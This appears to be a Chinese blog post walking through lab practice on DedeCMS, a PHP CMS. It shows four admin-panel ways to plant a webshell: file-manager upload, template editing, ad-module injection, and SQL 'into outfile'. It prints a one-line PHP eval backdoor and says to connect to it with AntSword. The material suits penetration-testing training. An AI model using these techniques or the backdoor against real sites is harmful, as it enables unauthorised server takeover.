dedecms织梦【php网站】-----获取webshell攻略

发布于：2025-03-22 ⋅ 阅读:(49) ⋅ 点赞:(0)

Dedecms 是织梦团队的php网站管理系统使用小皮搭建网站

1.搭建dedecms网站

下载Dedecms压缩包，解压后，放在小皮搭建的网站根目录下。

开启小皮的Apache或者Nginx和MySQL服务

2. 获取webshell

2.1 姿势⼀：通过⽂件管理器上传WebShell

思路：dedecms 后台可以直接上传任意⽂件，可以通过⽂件管理器上传 php⽂件获取webshell..

2.1.1 访问网站进行安装

访问网址：ip/网址根目录的文件名/其中的uploads文件夹/install

http://172.16.2.41/DedeCMS/uploads/install

逐步完成安装，参数配置数据库连接小皮的MySQL数据库。

2.1.2 配置相关信息，并进行后台登录

#后台 http://172.16.1.10/dede

#信息

username:admin

password:123456

2.1.3 上传一句话木马

登陆到后台点击【核⼼】 --》【⽂件式管理器】 --》【⽂件上传】将准备好的⼀句话代

码上传...OK

2.1.4 访问文件，蚁剑连接

双击shell.php访问，将url在蚁剑进行连接，即获得webshell

2.2 姿势⼆：修改模板⽂件拿WebShell

2.2.1 修改网站默认模板，写入一句话木马

与WPCMS类似，直接修改模板拿WebShell..

点击【模板】 --》【默认模板管理】 --》【index.htm】

---》【修改】在⽂件修改中添加phpinfo();....如下点击保存

2.2.2 更新主页

点击【⽣成】 --》【更新主⻚ HTML 】 --》将主⻚位置修改为【 ../index.php 】--》

点击【⽣成静态】 --》点击【更新主⻚】再次访问站点⾸⻚可发现变化.

2.2.3 访问主页

url：172.16.2.41/DedeCMS/uploads/index.php

点击浏览，即可发现phpinfo()执行成功

2.3 姿势三：后台任意命令执⾏拿WebShell

点击【模块】 --》【⼴告管理】 --》【增加⼀个新⼴告】 --》在【⼴告内容】处添

加⼀句话代码--》点击【确定】

点击【代码】

获取拼接的部分路径：/DedeCMS/uploads/plus/ad_js.php?aid=1

拼接url进行访问：http://172.16.2.41/DedeCMS/uploads/plus/ad_js.php?aid=1

蚁剑进行连接，即获得webshell

2.4 姿势四：通过后台sql命令执⾏拿webshell

点击系统---SQL命令行工具

输入：select @@basedir; 发现页面显示目录地址可判断出网站根目录

into outfile 写入一句话木马文件

select '<?php @eval($_POST[cmd]);>' into outfile 'E:/phpstudy_pro/WWW/shell.php'

访问该木马文件，蚁剑进行连接，即获得webshell

DEDECMS 织梦网站框架常见漏洞的利用

多种获取shell的方法练习。

练习结束，望大家能有所帮助和收获。

拜拜。。。

-------------2025/3/20 21:51